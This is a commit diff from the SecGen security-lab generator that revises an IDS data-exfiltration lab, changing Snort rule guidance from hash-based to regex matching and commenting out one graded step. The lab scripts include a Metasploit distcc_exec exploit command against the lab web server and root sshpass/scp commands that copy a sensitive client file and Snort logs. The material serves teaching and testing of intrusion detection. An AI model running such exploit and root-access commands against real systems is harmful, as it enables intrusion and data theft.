digital-forensics-labs/SecGen
1
0
Fork 0
mirror of https://github.com/cliffe/SecGen.git synced 2026-02-22 11:48:17 +00:00
Code Issues Packages Projects Releases Wiki Activity

lab update

Browse Source
This commit is contained in:
Z. Cliffe Schreuders
2017-12-08 13:58:59 +00:00
parent f1590bc6c0
commit cecf892d69
3 changed files with 56 additions and 56 deletions
Download Patch File Download Diff File Expand all files Collapse all files

8
modules/generators/structured_content/hackerbot_config/ids_exfiltration/secgen_metadata.xml
View File

@@ -29,18 +29,10 @@
</generator>
</default_input>
<!--TODO: less flags-->
<default_input into="flags">
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
</default_input>
<default_input into="root_password">

14
modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/dlp.md.erb
View File

@@ -14,12 +14,18 @@ Hint: you can include your sensitive data directly in a Snort rule. This is very
It is fine to monitor all ports, so long as your rule(s) detect transfer of the file.
#### Hash-based exfiltration detection
#### Regular expression-based exfiltration detection
Assuming the data you are protecting is sensitive, you likely don't want your Snort rules to contain direct copies of all your most sensitive data. For this reason, Snort rules can contain hashes to match against.
Assuming the data you are protecting is sensitive, you likely don't want your Snort rules to contain direct copies of all your most sensitive data. For this reason, Snort rules can contain regular expressions to match against.
It is possible to write Snort rules that detect the transfer of the contents of your files, based on hashes, so that the Snort rule does not contain any plain text of your document.
It is possible to write Snort rules that detect the transfer of the contents of your files, based on pattern matching, so that the Snort rule does not contain the sensitive parts of your document.
Hint: consider using the protected\_content keyword in your rule.
Hint: consider using the pcre keyword in your rule.
> Side note: *Hash-based exfiltration detection*: **you don't need to use this for this lab.**
> Assuming the data you are protecting is sensitive, you likely don't want your Snort rules to contain direct copies of all your most sensitive data. For this reason, Snort rules can contain hashes to match against.
> Using newer versions of Snort it is possible to write Snort rules that detect the transfer of the contents of your files, based on hashes (using the protected\_content keyword), so that the Snort rule does not contain any plain text of your document.
---

90
modules/generators/structured_content/hackerbot_config/ids_exfiltration/templates/lab.xml.erb
View File

@@ -40,7 +40,7 @@
$sensitive_files_location = "/home/#{$main_user}/trade_secrets/"
REQUIRED_FLAGS = 10
REQUIRED_FLAGS = 3
while $flags.length < REQUIRED_FLAGS
$flags << "flag{#{SecureRandom.hex}}"
Print.err "Warning: Not enough flags provided to hackerbot_config generator, some flags won't be tracked/marked!"
@@ -167,51 +167,53 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
</attack>
<attack>
<% $rand_alert1 = SecureRandom.hex(3) %>
<!--get the snort alerts before-->
<!--and make a copy of the file to a new location -->
<pre_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $web_server_ip %> 'cp <%= $sensitive_files_location %>clients.csv <%= $rand_tmp_restingplace %>; chmod 644 <%= $rand_tmp_restingplace %>'; stat0=$?; echo -$stat0; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_before; echo --$?</pre_shell>
<!--exploit and read contents of sensitive file over the network-->
<get_shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</get_shell>
<!--trigger the rule by sending the data-->
<post_command>cat <%= $rand_tmp_restingplace %>; echo --$?</post_command>
<!--get the snort alerts after, and diff for new alerts generated-->
<post_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_after; echo --$?; diff -n /tmp/snort_alert_before /tmp/snort_alert_after | tail -n 5 | grep <%= $rand_alert1 %> >/dev/null; echo triggered:$?; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/etc/snort/rules/my.rules /tmp/snort_rules; echo rules:$?; grep '^alert.*msg:".*<%= $rand_alert1 %>.*".*protected_content:"' /tmp/snort_rules >/dev/null; echo good_rule:$? </post_shell>
<suppress_command_output_feedback />
<!--TODO: use a version of snort that supports protected_content (2.9.7+ as found in Debian Stretch) -->
<!--TODO: the below should work with the right version of Snort-->
<!--<attack>-->
<!--<% $rand_alert1 = SecureRandom.hex(3) %>-->
<!--&lt;!&ndash;get the snort alerts before&ndash;&gt;-->
<!--&lt;!&ndash;and make a copy of the file to a new location &ndash;&gt;-->
<!--<pre_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $web_server_ip %> 'cp <%= $sensitive_files_location %>clients.csv <%= $rand_tmp_restingplace %>; chmod 644 <%= $rand_tmp_restingplace %>'; stat0=$?; echo -$stat0; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_before; echo &#45;&#45;$?</pre_shell>-->
<!--&lt;!&ndash;exploit and read contents of sensitive file over the network&ndash;&gt;-->
<!--<get_shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</get_shell>-->
<!--&lt;!&ndash;trigger the rule by sending the data&ndash;&gt;-->
<!--<post_command>cat <%= $rand_tmp_restingplace %>; echo &#45;&#45;$?</post_command>-->
<!--&lt;!&ndash;get the snort alerts after, and diff for new alerts generated&ndash;&gt;-->
<!--<post_shell>sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/var/log/snort/alert /tmp/snort_alert_after; echo &#45;&#45;$?; diff -n /tmp/snort_alert_before /tmp/snort_alert_after | tail -n 5 | grep <%= $rand_alert1 %> >/dev/null; echo triggered:$?; sshpass -p <%= $root_password %> scp -prv -oStrictHostKeyChecking=no root@<%= $ids_server_ip %>:/etc/snort/rules/my.rules /tmp/snort_rules; echo rules:$?; grep '^alert.*msg:".*<%= $rand_alert1 %>.*".*protected_content:"' /tmp/snort_rules >/dev/null; echo good_rule:$? </post_shell>-->
<!--<suppress_command_output_feedback />-->
<prompt>Update your rule so that it doesn't contain any of the sensitive data. Use hash-based matching. You have a copy in <%= $sensitive_files_location %>clients.csv Use one or more Snort rules to detect unencrypted transport of the file. The alert must include the message "<%= $rand_alert1 %>".</prompt>
<!--<prompt>Update your rule so that it doesn't contain any of the sensitive data. Use hash-based matching. You have a copy in <%= $sensitive_files_location %>clients.csv Use one or more Snort rules to detect unencrypted transport of the file. The alert must include the message "<%= $rand_alert1 %>".</prompt>-->
<condition>
<output_matches>good_rule:1</output_matches>
<message>:( Couldn't find your snort rule on the IDS server in /etc/snort/rules/my.rules. You are missing *protected_content* matching or the message from your rule.</message>
</condition>
<condition>
<output_matches>triggered:1</output_matches>
<message>:( Your rule wasn't triggered.</message>
</condition>
<condition>
<output_matches>triggered:0.*good_rule:0</output_matches>
<message>:) Well done! <%= $flags.pop %>.</message>
<trigger_next_attack />
</condition>
<condition>
<output_matches>-1</output_matches>
<message>:( Failed to ssh to the web server (<%= $web_server_ip %>)</message>
</condition>
<condition>
<output_matches>--1</output_matches>
<message>:( Failed to scp to the ids server (<%= $ids_server_ip %>)</message>
</condition>
<condition>
<output_matches>--0</output_matches>
<message>Continuing...</message>
</condition>
<else_condition>
<message>:( Something was not quite right...</message>
</else_condition>
<!--<condition>-->
<!--<output_matches>good_rule:1</output_matches>-->
<!--<message>:( Couldn't find your snort rule on the IDS server in /etc/snort/rules/my.rules. You are missing *protected_content* matching or the message from your rule.</message>-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>triggered:1</output_matches>-->
<!--<message>:( Your rule wasn't triggered.</message>-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>triggered:0.*good_rule:0</output_matches>-->
<!--<message>:) Well done! <%= $flags.pop %>.</message>-->
<!--<trigger_next_attack />-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>-1</output_matches>-->
<!--<message>:( Failed to ssh to the web server (<%= $web_server_ip %>)</message>-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>&#45;&#45;1</output_matches>-->
<!--<message>:( Failed to scp to the ids server (<%= $ids_server_ip %>)</message>-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>&#45;&#45;0</output_matches>-->
<!--<message>Continuing...</message>-->
<!--</condition>-->
<!--<else_condition>-->
<!--<message>:( Something was not quite right...</message>-->
<!--</else_condition>-->
</attack>
<!--</attack>-->
<attack>
<% $rand_alert2 = SecureRandom.hex(3)
@@ -260,7 +262,7 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
<quiz>
<question>Where else is the sensitive data at rest? Use regexp searches to find the file (not hashes).</question>
<question>Where else is the sensitive data at rest across the various server VMs for the lab? Use regexp searches to find the file (don't use hashes).</question>
<answer><%= $rand_tmp_restingplace %></answer>
<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>
<trigger_next_attack />